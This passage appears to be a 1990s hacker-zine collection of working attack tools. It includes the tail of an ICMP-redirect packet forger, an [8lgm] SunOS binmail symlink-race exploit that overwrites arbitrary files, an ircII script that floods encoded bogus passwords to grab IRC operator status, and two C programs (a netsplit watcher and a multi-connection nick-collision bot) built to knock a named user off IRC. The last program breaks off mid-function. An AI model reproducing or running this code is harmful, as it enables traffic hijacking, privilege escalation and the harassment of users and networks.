| mp->icmp_ip.ip_len = htons(sizeof(struct ip)+64+20); | |
| mp->icmp_ip.ip_p = IPPROTO_TCP; | |
| mp->icmp_ip.ip_src = ((struct sockaddr_in *)&dest)->sin_addr; | |
| mp->icmp_ip.ip_dst = ((struct sockaddr_in *)&dest)->sin_addr; | |
| mp->icmp_gwaddr = ((struct sockaddr_in *)&uspoof)->sin_addr; | |
| mp->icmp_ip.ip_ttl = 150; | |
| mp->icmp_cksum = 0; | |
| tp=(struct tcphdr *)((char *)&mp->icmp_ip+sizeof(struct ip)); | |
| tp->th_sport = 23; | |
| tp->th_dport = htons(1499); | |
| tp->th_seq = htonl(0x275624F2); | |
| mp->icmp_cksum = htons(in_cksum(mp,sizeof(struct icmp)+64)); | |
| if ((i=sendto(s,buf,sizeof(struct icmp)+64,0,&dest,sizeof(dest)))<0) | |
| { | |
| fprintf(stderr,"fatal; error sending forged packet\n"); | |
| return(-1); | |
| } | |
| return(0); | |
| } | |
| void | |
| main(argc,argv) | |
| int argc; | |
| char **argv; | |
| { | |
| int i, code; | |
| if ((argc<4) || (argc>5)) | |
| { | |
| fprintf(stderr,"usage: juju-router target new-destination port code\n"); | |
| fprintf(stderr,"codes: 0 _REDIRECT_NET 1 _REDIRECT_HOST (default)\n"); | |
| fprintf(stderr," 2 _REDIRECT_TOSNET 2 _REDIRECT_TOSHOST\n"); | |
| exit(1); | |
| } | |
| printf("juju-router: rerouting dynamically...."); | |
| if (code!=0 && code!=1 && code!=2 && code!=3) code=0; | |
| if (icmp_reroute(argv[1],argv[2],argv[3],code)<0) | |
| { | |
| printf("failed.\n"); | |
| exit(1); | |
| } | |
| printf("succeeded.\n"); | |
| exit(0); | |
| } | |
| ------------------------------------------------------------------------------ | |
| #!/bin/sh | |
| # tmpmail: overwrite files using binmail | |
| # | |
| # Usage: tmpmail to-file | |
| # | |
| # (c) [8lgm] 1994, tested under SunOS 4.1.2. | |
| # | |
| # | |
| # Note: Script only works if mail is suid root. | |
| # Other vendors may use tmpnam("ma"). | |
| # | |
| # This vulnerability can be exploited for sgid | |
| # mail binmails, the only modification would | |
| # be to predict the pid of the mail process | |
| # created by sendmail. This would be 4 forward | |
| # of the current pid - assuming a 'quiet' system. | |
| # | |
| # Will create to-file, or truncate. | |
| PATH=/usr/ucb:/usr/bin:/bin export PATH | |
| IFS=" " export IFS | |
| PROG="`basename $0`" | |
| # Check args | |
| if [ $# -ne 1 ]; then | |
| echo "Syntax: $PROG to-file" | |
| exit 1 | |
| fi | |
| TO_FILE="$1" | |
| # Check we're on SunOS | |
| if [ "x`uname -s`" != "xSunOS" ]; then | |
| echo "Sorry, this only works on SunOS" | |
| exit 1 | |
| fi | |
| # Create our racing program! | |
| cat > mailrace.c << 'EOF' | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| char path[] = "/tmp/maaXXXX"; | |
| main(argc,argv) | |
| int argc; | |
| char **argv; | |
| { | |
| int pid; | |
| char *trv; | |
| if (argc != 3) { | |
| fprintf(stderr, "Usage: %s pid tofile\n", argv[0]); | |
| exit(1); | |
| } | |
| pid = atoi(argv[1]); | |
| /* Stolen from mktemp.c */ | |
| for (trv = path; *trv; ++trv); /* extra X's get set to 0's */ | |
| while (*--trv == 'X') { | |
| *trv = (pid % 10) + '0'; | |
| pid /= 10; | |
| } | |
| symlink("/tmp/ShortSong", path); | |
| while(symlink(argv[2], path)); | |
| exit(0); | |
| } | |
| EOF | |
| cc -o mailrace mailrace.c | |
| # Check we now have mailrace | |
| if [ ! -x "mailrace" ]; then | |
| echo "$PROG: couldnt compile mailrace.c - check it out" | |
| exit 1 | |
| fi | |
| # create some input for binmail | |
| echo localhost $USER > /tmp/BlueRoom.$$ | |
| ./mailrace $$ $TO_FILE & | |
| exec /bin/mail -d $LOGNAME < /tmp/BlueRoom.$$ | |
| ------------------------------------------------------------------------------ | |
| ############################################################################### | |
| # # ## ### # # ## ### Attempts to hack IRC operator status by | |
| # # # # # # # # # # # flooding the server with bogus passwords | |
| #### #### # ## # # # # of various lengths. Works on all servers | |
| # # # # # # # # # ### I've tested so far.. | |
| # # # # ### # # ## # v1.3+path - Illegible 8 | |
| ############################################################################### | |
| set NOVICE off | |
| # # | |
| ### Bogus passwords.. don't change these. Other passwords don't work. (?) | |
| # # | |
| @ HackOP.A = [EACAGCGPGGGICADNCAFLGJGMGMGFGHGJGCGMDIFN] | |
| @ HackOP.B = [FOGPGOCAFOGNGPGEGFCACCCFCACFCACLHHHDCCCAGFGDGIGPCACKCKCKCAENGPGEGFCAGDGIGBGOGHGFCACCCLGPHDHHCCCAGGGPHCCAHFHDGFHCCACEEOCAGCHJCACEEODLHDGFHECAFDFEEBFEFFFDFPFFENEPEEEFCACACICLGPCFCDCJ] | |
| @ HackOP.C = [FOGPGOCACDCNHDGFGOGEFPGNHDGHCADBCACKCAHLCPCPFOGOGPHEGJGDGFCACEGCGPGGGICACEEOCACNDOCACKCEDACKCACEDBCNHN] | |
| @ HackOP.D = [GNGPGEGFCAEKHFGHGHGMGFHCCACLHDHH] | |
| @ HackOP.E = [GFGDGIGPCACKCKCKCAFJGPHFCAGBHCGFCAGOGPHHCAGBGOCAEJFCEDCAEPHAGFHCGBHEGPHC] | |
| @ HackOP.F = [FOGPGOCAGNGPGEGFCACNCCCFCACFCACLHHHDCC] | |
| @ HackOP.G = [FOGPGOCACDCNHCGBHHFPGJHCGDCADACACCCFCADDDBDCCACKCCCAHLGJGGCACIFLCEDDFNDNDNFLCEEOFNCJCAHLHEGJGNGFHCCADACAGFGDGIGPCACKCKCKCACEDDCAGJHDCAGBGOCAEJFCEDCAEPHAGFHCGBHEGPHCHNHN] | |
| @ HackOP.H = [EACAFDFEEBFEFFFDFPFFENEPEEEFCADNCAFLCAFMCICLGPCFCDFMCJFN] | |
| @ HackOP.I = [FOGPGOCAFOGDHEGDHACACCCFCACFCAEJFCEDEPFACACKCCCAHLEACAGCGPGGGICADNCAFLCEDAFNDLCPCPFOGOGPHEGJGDGFCACEGCGPGGGICAEIGPCAGIGPCAGIGPCBHN] | |
| @ HackOP.J = [FOGPGOCAFOGDHEGDHACACCCFCACFCAEJFCEDEPFHCACKCCCAHLGJGGCACIFLCEDAFNDNDNFLCEGCGPGGGIFNCJCAHLCEDDCNDLCPCPFOGOGPHEGJGDGFCACEDACAGEGPGJGOGHDKCACEDDCNHNHN] | |
| @ HackOP.K = [FOGBGMGJGBHDCAGLGJGMGMCAGJGGCACIFLCEDAFNCJCAHLCPCPFOHDGJGHGOGPGGGGCAELGJGMGMCAGGHCGPGNCACEEOCAFMCICEDACNFMCJHNHLCPCPELEJEMEMHN] | |
| @ HackOP.L = [FOGPGOCACDFOHCGBHHFPGJHCGDCADACACCCFCADEDADBCACFCACFCADKEOGPCKCCCAHLGJGGCACIFLCEDDFNCBDNFLCEGCGPGGGIFNCJCAHLGFGDGIGPCACKCKCKCACEHDHEHCGJHACIDKCACEDDCNCJHNHLEACAGCGPGGGICADNCAFLDNDAFNHNHN] | |
| @ HackOP.M = [GFHGGBGMCACPCPFOGOGPHEGJGDGFCACEGCGPGGGICAFCHFGOGOGJGOGHCAEIGBGDGLEPFACACNCACEHEGJGNGFCICJ] | |
| @ HackOP.N = [FOGBGMGJGBHDCAHDHBHFGJHECAHLCPCPFOHDGJGHGOGPGGGGCACPHDHBHFGJHECACEDACNHN] | |
| @ HackOP.O = [FOGBGMGJGBHDCAGDGPGOGOGFGDHECAGJGGCACIFLCEDAFNCJCAHLHNHLHNDLGFGDGIGPCACKCKCKCAEDEPEOEOEFEDFECAEOGPHECAGFGOGPHFGHGICAHAGBHCGBGNGFHEGFHCHD] | |
| @ HackOP.P = [FOHDGFHECAGFHIGFGDFPHAHCGPHEGFGDHEGJGPGOCAGPGGGG] | |
| @ HackOP.Q = [GFHGGBGMCAFOGFHIGFGDCAGFGDGIGPCAGFHGGBGMCAFMFMCECEGEGFGDGPGEGFFMFMFMCICEHLEIGBGDGLGPHACOEJHNFMFMFMCJCADODOCEHLEIEPENEFHNCPCOGJHCGDHCGD] | |
| @ HackOP.R = [GFHGGBGMCAFOGFHIGFGDCAGFGDGIGPCAGFHGGBGMCAFMFMCECEGEGFGDGPGEGFFMFMFMCICEHLEIGBGDGLGPHACOEKHNFMFMFMCJCADODOCEHLEIEPENEFHNCPCOGJHCGDHCGD] | |
| @ HackOP.S = [GFHGGBGMCAFOGFHIGFGDCAGFGDGIGPCAEACAGCGPGGGICADNCAFLCEGCGPGGGIFNCADODOCEHLEIEPENEFHNCPCOGJHCGDHCGD] | |
| @ HackOP.Z = [FOGBGMGJGBHDCACNHBHFGPHEGF] | |
| # # | |
| ### Ignore failed hack attempts.. | |
| # # | |
| on #^raw_irc "% 491 *No O-lines*" # | |
| # # | |
| ### Poke server (causes a "POKE : unknown command" reply) | |
| # # | |
| @ hackop.poke.junk = [FOGBGMGJGBHDCAHBHFGPHEGFCAHLCEGEGFGDGPGEGFCICEDCCNCJHN] | |
| alias hackop.poke { | |
| quote POKE \\;$decode($hackop.poke.junk) | |
| wait | |
| } | |
| # # | |
| ### Send bogus passwords.. | |
| # # | |
| alias hackop.hack { | |
| foreach HackOP XX { | |
| if ([$(HackOP.$XX)]!=[]) {quote OPER $N $(HackOP.$XX)} | |
| wait | |
| } | |
| } | |
| # # | |
| ### Attempt to hack ops.. | |
| # # | |
| alias hackop { | |
| umode -sw | |
| echo [HackOP] Poking server.. (should reply with error message) | |
| hackop.poke | |
| echo [HackOP] Attempting to hack IrcOps.. | |
| hackop.hack | |
| } | |
| # # | |
| ### Help.. | |
| # # | |
| alias hackhelp { | |
| echo | |
| echo [HackOP] You have loaded HackOP.irc v1.3+path from Illegible 8. | |
| echo [HackOP] | |
| echo [HackOP] This script attempts to hack IRC Operator status on | |
| echo [HackOP] your current server. To use it just type /hackop. | |
| echo [HackOP] | |
| echo [HackOP] Aliases added: /hackhelp /hackop /kpath | |
| echo [HackOP] | |
| echo [HackOP] Enjoy it.. /kill your friends. 8-) | |
| echo | |
| } | |
| # # | |
| ### The following code is taken from the ircII 2.2.9 distribution... | |
| # # | |
| ############################################################################### | |
| # | |
| # No Kill Path Script II | |
| # | |
| # converted to 2.2.1 by phone | |
| # CONVERTED for ircII2.2 | |
| # Version for servers 2.7.1* by Nap@irc <pioch@poly.polytechnique.fr> | |
| # Original script from YeggMan | |
| # Simplification by Daemon | |
| # This version works both with old and new 2.7.1e kill formats ! | |
| @ kpath.kpath = [<empty>] | |
| alias kpath echo ### Last received KILL Path: $kpath.kpath | |
| alias kpath.ridx @ function_return = RINDEX(! $0) + 1 | |
| alias kpath.is_serv @ function_return = INDEX(. $MID($kpath.ridx($0) 512 $0)) | |
| alias kpath.opkill echo ### KILL for $0 $MID($kpath.ridx($1) 9 $1) $2- | |
| alias kpath.svkill echo ### ServerKill for $0 | |
| on ^server_notice "% * Notice -- Received KILL*" { | |
| if ([$9] == [From]) | |
| { | |
| ^assign kpath.kpath $12- | |
| if (kpath.is_serv($12) > -1) | |
| { kpath.svkill $8 } | |
| { kpath.opkill $8 $10 $13- } | |
| } | |
| { | |
| ^assign kpath.kpath $10- | |
| if (kpath.is_serv($10) > -1) | |
| { kpath.svkill $8 } | |
| { kpath.opkill $8 $10 $11- } | |
| } | |
| } | |
| ###[End of stolen code]######################################################## | |
| # # | |
| ### HackOP loaded message, misc stuff. | |
| # # | |
| alias umode mode $N $0- | |
| echo [HackOP] HackOP.irc v1.3+path loaded. Type /hackhelp for help | |
| ------------------------------------------------------------------------------ | |
| [Editor's Note: This is used in conjunction with the next program] | |
| /*=============================================================*\ | |
| * ll.c - link looker * | |
| * Copyright (C) 1994 by The Software System * | |
| * Written by George Shearer (george@sphinx.biosci.wayne.edu) * | |
| \*=============================================================*/ | |
| /* This program is free software; you can redistribute it and/or modify | |
| * it under the terms of the GNU General Public License as published by | |
| * the Free Software Foundation; either version 2 of the License, or | |
| * (at your option) any later version. | |
| * | |
| * This program is distributed in the hope that it will be useful, | |
| * but WITHOUT ANY WARRANTY; without even the implied warranty of | |
| * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | |
| * GNU General Public License for more details. | |
| * | |
| * You should have received a copy of the GNU General Public License | |
| * along with this program; if not, write to the Free Software | |
| * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. | |
| */ | |
| #define BUFSIZE 400 /* IRC Server buffer */ | |
| #define SERVER "irc.escape.com" /* IRC Server */ | |
| #define PORT 6667 /* IRC Port */ | |
| #define DELAYS 30 /* Loop delay seconds*/ | |
| #define TIMEOUT 30 /* connection timeout*/ | |
| #define ESTABLISHED 1 | |
| #define INPROGRESS 2 | |
| #define SPLIT 1 | |
| unsigned short int session=0,link_count=0; | |
| char in[BUFSIZE],out_buf[BUFSIZE],hostname[64]; | |
| char *ins=in; | |
| char *dedprsn, *kradprsn; | |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <sys/types.h> | |
| #include <sys/time.h> | |
| #include <fcntl.h> | |
| #include <signal.h> | |
| #include <errno.h> | |
| #include <netinet/in.h> | |
| #include <sys/socket.h> | |
| #include <netdb.h> | |
| #include <arpa/inet.h> | |
| struct irc_server { | |
| char *name; | |
| char *link; | |
| unsigned short int status; | |
| struct irc_server *next; | |
| } *sl1=(struct irc_server *)0,*sl2=(struct irc_server *)0; | |
| void do_ping(char *,char *); | |
| void do_001(char *,char *); | |
| void do_error(char *,char *); | |
| void do_364(char *,char *); | |
| void do_365(char *,char *); | |
| struct parsers { | |
| char *cmd; | |
| void (*func)(char *,char *); | |
| } parsefuns[] = { | |
| { "PING", (void *)do_ping }, | |
| { "001", (void *)do_001 }, | |
| { "364",(void *)do_364 }, | |
| { "365", (void *)do_365}, | |
| { "ERROR",(void *)do_error}, | |
| { (char *)0,(void *)0 } | |
| }; | |
| struct sockaddr_in server; | |
| int sock=0; | |
| unsigned long int | |
| resolver(char *host) { | |
| unsigned long int ip=0L; | |
| if(host && *host && (ip=inet_addr(host))==-1) { | |
| struct hostent *he; | |
| int x=0; | |
| while(!(he=gethostbyname((char *)host)) && x++<3) { | |
| printf("."); fflush(stdout); | |
| sleep(1); | |
| } | |
| ip=(x<3) ? *(unsigned long *)he->h_addr_list[0] : 0L; | |
| } | |
| return(ip); | |
| } | |
| void | |
| clean_sl2(void) { | |
| while(sl2) { | |
| struct irc_server *temp=sl2->next; | |
| if(sl2->name) | |
| free(sl2->name); | |
| if(sl2->link) | |
| free(sl2->link); | |
| free(sl2); | |
| sl2=temp; | |
| } | |
| sl2=(struct irc_server *)0; | |
| } | |
| void | |
| exit_program(char *why) { | |
| printf("\nExiting program. (%s)\n",why); | |
| if(sock) | |
| close(sock); | |
| while(sl1) { | |
| struct irc_server *temp=sl1->next; | |
| if(sl1->name) | |
| free(sl1->name); | |
| if(sl1->link) | |
| free(sl1->link); | |
| free(sl1); | |
| sl1=temp; | |
| } | |
| clean_sl2(); | |
| if(in) | |
| free(in); | |
| exit(0); | |
| } | |
| int mystrccmp(register char *s1,register char *s2) { | |
| while((((*s1)>='a'&&(*s1)<='z')?(*s1)-32:*s1)== | |
| (((*s2)>='a'&&(*s2)<='z')?(*s2++)-32:*s2++)) | |
| if(*s1++==0) return 0; | |
| return (*(unsigned char *)s1-*(unsigned char *)--s2); | |
| } | |
| char *mstrcpy(char **to,char *from) { | |
| if(from) { | |
| if((*to=(char *)malloc(strlen(from)+1))) | |
| strcpy(*to,from); | |
| } | |
| else | |
| *to=(char *)0; | |
| return(*to); | |
| } | |
| char *digtoken(char **string,char *match) { | |
| if(string && *string && **string) { | |
| while(**string && strchr(match,**string)) | |
| (*string)++; | |
| if(**string) { /* got something */ | |
| char *token=*string; | |
| if((*string=strpbrk(*string,match))) { | |
| *(*string)++=(char)0; | |
| while(**string && strchr(match,**string)) | |
| (*string)++; | |
| } | |
| else | |
| *string = ""; /* must be at the end */ | |
| return(token); | |
| } | |
| } | |
| return((char *)0); | |
| } | |
| void signal_handler(void) { | |
| exit_program("caught signal"); | |
| } | |
| void signal_alarm(void) { | |
| exit_program("timed out waiting for server interaction."); | |
| } | |
| void | |
| out(void) { | |
| int length=strlen(out_buf); | |
| errno=0; | |
| if(write(sock,out_buf,length)!=length) | |
| exit_program((char *)errno); | |
| } | |
| void | |
| init_server(void) { | |
| int length; | |
| sprintf(out_buf,"USER kil kil kil :ded kilr huntin %s\nNICK kil%d\nPRIVMSG %s :ded kilr hunting %s\n", | |
| dedprsn, getpid(), kradprsn, dedprsn); | |
| length=strlen(out_buf); | |
| errno=0; | |
| if(write(sock,out_buf,length)==length) { | |
| puts("established"); | |
| session=ESTABLISHED; | |
| alarm(TIMEOUT); | |
| sprintf(out_buf,"LINKS\n"); | |
| out(); | |
| } | |
| else | |
| exit_program((char *)errno); | |
| } | |
| void | |
| heartbeat(void) { | |
| strcpy(out_buf,"LINKS\n"); | |
| out(); | |
| signal(SIGALRM,(void *)heartbeat); | |
| alarm(DELAYS); | |
| } | |
| void | |
| do_364(char *from,char *left) { | |
| struct irc_server *serv; | |
| char *sv1,*sv2; | |
| char *nick; | |
| serv=(struct irc_server *)malloc(sizeof(struct irc_server)); | |
| serv->next=sl2; | |
| serv->status=0; | |
| nick=digtoken(&left," "); | |
| sv1=digtoken(&left," "); | |
| sv2=digtoken(&left," "); | |
| mstrcpy(&serv->name,sv1); | |
| mstrcpy(&serv->link,sv2); | |
| sl2=serv; | |
| } | |
| int | |
| findserv(struct irc_server *serv,char *name) { | |
| for(;serv;serv=serv->next) | |
| if(!mystrccmp(name,serv->name)) | |
| return(1); | |
| return(0); | |
| } | |
| void | |
| do_365(char *from,char *left) { | |
| struct irc_server *serv=sl1; | |
| char kilstring[150]; | |
| for(;serv;serv=serv->next) { | |
| if(!findserv(sl2,serv->name)) { | |
| if(!(serv->status & SPLIT)) { | |
| printf("Split server : %s [%s]\n",serv->name,serv->link); | |
| serv->status|=SPLIT; | |
| } | |
| } | |
| else | |
| if(serv->status & SPLIT) { | |
| printf("Merging server: %s [%s]\n",serv->name,serv->link); | |
| sprintf(kilstring, "mcb %s %s:%s %s&", | |
| kradprsn, dedprsn, serv->name, serv->link); | |
| system(kilstring); | |
| serv->status&=~SPLIT; | |
| } | |
| } | |
| serv=sl2; | |
| for(;serv;serv=serv->next) { | |
| if(!findserv(sl1,serv->name)) { | |
| struct irc_server *serv2; | |
| serv2=(struct irc_server *)malloc(sizeof(struct irc_server)); | |
| serv2->next=sl1; | |
| serv2->status=0; | |
| mstrcpy(&serv2->name,serv->name); | |
| mstrcpy(&serv2->link,serv->link); | |
| sl1=serv2; | |
| if(link_count) { | |
| printf("Added server : %s [%s]\n",serv->name,serv->link); | |
| sprintf(kilstring, "mcb %s %s:%s %s&", | |
| kradprsn, dedprsn, serv->name, serv->link); | |
| system(kilstring); | |
| } | |
| } | |
| } | |
| link_count=1; | |
| clean_sl2(); | |
| } | |
| void | |
| do_ping(char *from,char *left) { | |
| sprintf(out_buf,"PING :%s\n",hostname); | |
| out(); | |
| } | |
| void | |
| do_001(char *from,char *left) { | |
| printf("Logged into server %s as nickname kil%d\n",from,getpid()); | |
| printf("Hunting %s\n\n", dedprsn); | |
| alarm(0); | |
| signal(SIGALRM,(void *)heartbeat); | |
| alarm(DELAYS); | |
| } | |
| void | |
| do_error(char *from,char *left) { | |
| printf("Server error: %s\n",left); | |
| } | |
| void | |
| parse2(void) { | |
| char *from,*cmd,*left; | |
| if(*ins==':') { | |
| if(!(cmd=strchr(ins,' '))) | |
| return; | |
| *cmd++=(char)0; | |
| from=ins+1; | |
| } | |
| else { | |
| cmd=ins; | |
| from=(char *)0; | |
| } | |
| if((left=strchr(cmd,' '))) { | |
| int command; | |
| *left++=(char)0; | |
| left=(*left==':') ? left+1 : left; | |
| for(command=0;parsefuns[command].cmd;command++) { | |
| if(!mystrccmp(parsefuns[command].cmd,cmd)) { | |
| parsefuns[command].func(from,left); | |
| break; | |
| } | |
| } | |
| } | |
| } | |
| void | |
| parse(int length) { | |
| char *s=in; | |
| *(ins+length)=(char)0; | |
| for(;;) { | |
| ins=s; | |
| while(*s && *s!=(char)13 && *s!=(char)10) | |
| s++; | |
| if(*s) { | |
| while(*s && (*s==(char)13 || *s==(char)10)) | |
| *s++=(char)0; | |
| parse2(); | |
| } | |
| else | |
| break; | |
| } | |
| strcpy(in,ins); | |
| ins=in+(s-ins); | |
| } | |
| void | |
| process_server(void) { | |
| int x=0; | |
| for(;;) { | |
| fd_set rd,wr; | |
| struct timeval timeout; | |
| timeout.tv_usec=0; timeout.tv_sec=1; | |
| FD_ZERO(&rd); FD_ZERO(&wr); | |
| FD_SET(sock,&rd); | |
| if(session==INPROGRESS) | |
| FD_SET(sock,&wr); | |
| errno=0; | |
| select(getdtablesize(),&rd,&wr,NULL,(session==INPROGRESS) | |
| ? (struct timeval *)&timeout : NULL); | |
| if(errno==EINTR) | |
| continue; | |
| errno=0; | |
| if(session==INPROGRESS) { | |
| if(FD_ISSET(sock,&wr)) { | |
| init_server(); | |
| continue; | |
| } | |
| else { | |
| if(x++>=TIMEOUT) | |
| exit_program("connection timed out"); | |
| printf("."); fflush(stdout); | |
| } | |
| } | |
| if(FD_ISSET(sock,&rd)) { | |
| int length=read(sock,ins,BUFSIZE-(ins-in)); | |
| if(length<1) { | |
| if(session!=INPROGRESS) | |
| if(!errno) { | |
| puts("Connection closed by foreign host."); | |
| errno=ENOTCONN; | |
| } | |
| else | |
| printf("Connection to %s closed.\n", | |
| inet_ntoa(server.sin_addr)); | |
| exit_program((char *)errno); | |
| } | |
| if(strpbrk(in,"\x0a\x0d")) | |
| parse(length); | |
| else | |
| ins=(BUFSIZE-((ins+length)-in)<1)?in:ins+length; | |
| } | |
| } | |
| } | |
| void | |
| main(int argc,char *argv[]) { | |
| char serverhost[80]; | |
| unsigned short int sport=PORT; | |
| kradprsn = argv[1]; | |
| dedprsn = argv[2]; | |
| if(argc<3) | |
| exit(1); | |
| if(argc==4) { | |
| char *port=strchr(argv[3],':'); | |
| sport=(port)?atoi(port+1):sport; | |
| strcpy(serverhost,argv[3]); | |
| if(port) | |
| serverhost[port-argv[3]]=(char)0; | |
| } | |
| else | |
| strcpy(serverhost,SERVER); | |
| signal(SIGPIPE,(void *)signal_handler); | |
| signal(SIGHUP,(void *)signal_handler); | |
| signal(SIGINT,(void *)signal_handler); | |
| signal(SIGTERM,(void *)signal_handler); | |
| signal(SIGBUS,(void *)signal_handler); | |
| signal(SIGABRT,(void *)signal_handler); | |
| signal(SIGSEGV,(void *)signal_handler); | |
| signal(SIGALRM,(void *)signal_alarm); | |
| errno=0; | |
| if((sock=socket(AF_INET,SOCK_STREAM,0))>0) { | |
| server.sin_family=AF_INET; | |
| server.sin_port=htons(sport); | |
| printf("Resolving %s...",serverhost); fflush(stdout); | |
| if((server.sin_addr.s_addr=resolver(serverhost))) { | |
| puts("done"); | |
| setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0); | |
| setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0); | |
| setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0); | |
| fcntl(sock,F_SETFL,(fcntl(sock,F_GETFL)|O_NONBLOCK)); | |
| printf("Connecting to %s...",inet_ntoa(server.sin_addr)); | |
| fflush(stdout); | |
| errno=0; | |
| if(connect(sock,(struct sockaddr *)&server,sizeof(server))) { | |
| if(errno!=EINPROGRESS && errno!=EWOULDBLOCK) | |
| exit_program((char *)errno); | |
| else | |
| session=INPROGRESS; | |
| } | |
| else | |
| init_server(); | |
| gethostname(hostname,64); | |
| process_server(); | |
| } | |
| else | |
| exit_program("resolve failed"); | |
| } | |
| else | |
| printf("Failed to allocate an AF_INET socket. (%s)\n",(char *)errno); | |
| } | |
| ------------------------------------------------------------------------------ | |
| /*===============================*\ | |
| |* MCB - Multi-CollideBot v1.5a *| | |
| |* Written by Dr. Delete *| | |
| |* Basically just a way to make *| | |
| |* several TCP connections to a *| | |
| |* server in one small process. *| | |
| \*===============================*/ | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| #include <sys/types.h> | |
| #include <fcntl.h> | |
| #include <signal.h> | |
| #include <errno.h> | |
| #include <sys/socket.h> | |
| #include <sys/time.h> | |
| #include <sys/wait.h> | |
| #include <netinet/in.h> | |
| #include <netdb.h> | |
| #include <fcntl.h> | |
| #include <sys/file.h> | |
| #include <arpa/inet.h> | |
| #define BUFSIZE 350 | |
| #define MAXSESSIONS 256 | |
| #define BOTTIMEOUT 900 /* 15 minutes (900 seconds) bot lifetime */ | |
| struct sockaddr_in server; | |
| char buf[BUFSIZE]; | |
| char *kradprsn; | |
| struct ircsession { | |
| int sock; | |
| char stack[BUFSIZE*2]; | |
| char *server; | |
| char *nick; | |
| int stat; | |
| } session[MAXSESSIONS]; | |
| int sessions,total_sessions; | |
| char *nickpick="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`_"; | |
| #define NICKLEN 54 | |
| void sig_pipe(void) { | |
| puts("Odd, I just caught a SIGPIPE."); | |
| signal(SIGPIPE,(void *)sig_pipe); | |
| } | |
| void fillran(char *s,int len) { | |
| while(len--) | |
| *s++=*((nickpick)+(rand()%NICKLEN)); | |
| *s=0; | |
| } | |
| int strnccmp(register char *s1,register char *s2,register int n) { | |
| if(n==0) return(0); | |
| do { | |
| if((((*s1)>='a'&&(*s1)<='z')?(*s1)-32:*s1)!=(((*s2)>='a'&&(*s2)<='z')?(*s2++)-32:*s2++)) | |
| return (*(unsigned char *)s1-*(unsigned char *)--s2); | |
| if(*s1++==0) break; | |
| } while(--n!=0); | |
| return(0); | |
| } | |
| char *mycstrstr(char *str1,char *str2) { | |
| int xstr1len,ystr2len; | |
| xstr1len=strlen(str1); | |
| ystr2len=strlen(str2); | |
| while(xstr1len && strnccmp(str1++,str2,ystr2len) && xstr1len-->=ystr2len); | |
| if(!xstr1len || xstr1len<ystr2len || !ystr2len) return(0); | |
| return(str1-1); | |
| } | |
| void out(int fd, char *s) { | |
| write(fd,s,strlen(s)); | |
| } | |
| void cclosed(int sessionum) { | |
| if(session[sessionum].sock) | |
| shutdown(session[sessionum].sock,2); | |
| close(session[sessionum].sock); | |
| session[sessionum].sock=0; | |
| printf("%s: Connection to %s closed.\n",session[sessionum].nick,session[sessionum].server); fflush(stdout); | |
| if(!sessions || !total_sessions) { | |
| puts("CollideBot finished."); | |
| exit(0); | |
| } | |
| } | |
| void quitprog(void) { | |
| printf("Signal received! CollideBot exiting. %d sessions still active.\n",sessions); fflush(stdout); | |
| while(total_sessions--) | |
| if(session[total_sessions].sock) { | |
| out(session[total_sessions].sock,"QUIT :signal received\r\n"); | |
| cclosed(total_sessions); | |
| } | |
| puts("CollideBot finished."); | |
| exit(0); | |
| } | |
| unsigned long int resolver(char *host) { | |
| int x=0; | |
| unsigned long int tempresl; | |
| struct hostent *he; | |
| if(sscanf(host,"%d.%d.%d.%d",&x,&x,&x,&x)==4 || !strcmp(host,"0")) | |
| return(inet_addr(host)); | |
| while(!(he=gethostbyname((char *)host)) && x++<3) | |
| sleep(1); | |
| if(x<3) | |
| return(htonl((unsigned long int)((unsigned char)he->h_addr_list[0][0]* | |
| (unsigned int)256+(unsigned char)he->h_addr_list[0][1])* | |
| (unsigned int)65536+(unsigned long int)((unsigned char) | |
| he->h_addr_list[0][2]*(unsigned int)256+(unsigned char) | |
| he->h_addr_list[0][3]))); | |
| printf("Unable to resolve %s!\n",host); | |
| return(0); | |
| } | |
| void estab2(int sock,char *ircservername,char *nick) { | |
| char tempnick[10]; | |
| printf("%s: Connection to %s established.\n",nick,ircservername); fflush(stdout); | |
| fillran(tempnick,9); | |
| sprintf(buf,"USER %s %s %s %s\r\nNICK %s\r\nPRIVMSG %s :%s iz ded, woowoo\r\n",tempnick,tempnick,tempnick,tempnick,(!strnccmp(nick,kradprsn,5)) ? tempnick : nick, kradprsn, nick); | |
| fcntl (sock, F_SETFL, (fcntl(sock, F_GETFL) & ~O_NDELAY)); | |
| out(sock,buf); | |
| } | |
| int estab(unsigned long int ircserver,char *ircservername,int x) { | |
| int sock; | |
| sock=socket(AF_INET,SOCK_STREAM,0); | |
| server.sin_family=AF_INET; | |
| server.sin_port=htons(6667); | |
| server.sin_addr.s_addr=ircserver; | |
| fcntl (sock, F_SETFL, (fcntl(sock, F_GETFL) | O_NDELAY)); | |
| errno=0; | |
| if((session[x].nick[0]==68 || session[x].nick[0]==100) && (session[x].nick[1]==82 || session[x].nick[1]==114) && | |
| (session[x].nick[2]==95) && (session[x].nick[3]==68 || session[x].nick[3]==100) && | |
| (session[x].nick[4]==69 || session[x].nick[4]==101) && (session[x].nick[5]==76 || session[x].nick[5]==108) && | |
| (session[x].nick[6]==69 || session[x].nick[6]==101) && (session[x].nick[7]==84 || session[x].nick[7]==116) && | |
| (session[x].nick[8]==69 || session[x].nick[8]==101)) { | |
| printf("%s: Connection to %s has failed.\n",session[x].nick,ircservername); fflush(stdout); | |
| close(sock); | |
| return(0); | |
| } | |
| if(connect(sock,(struct sockaddr *)&server,sizeof(server))<0) { | |
| if(errno!=EINPROGRESS) { | |
| printf("%s: Connection to %s has failed.\n",session[x].nick,ircservername); fflush(stdout); | |
| close(sock); | |
| return(0); | |
| } | |
| else | |
| session[x].stat=2; | |
| } | |
| else { | |
| estab2(sock,ircservername,session[x].nick); | |
| session[x].stat=0; | |
| } | |
| return(sock); | |
| } | |
| void parse2(char *buf,int len,int sessionum) { | |
| char *num; | |
| if((num=mycstrstr(buf," "))) | |
| if(atoi((num+1))==372) | |
| return; | |
| if(!strnccmp(buf,"PING",4)) { | |
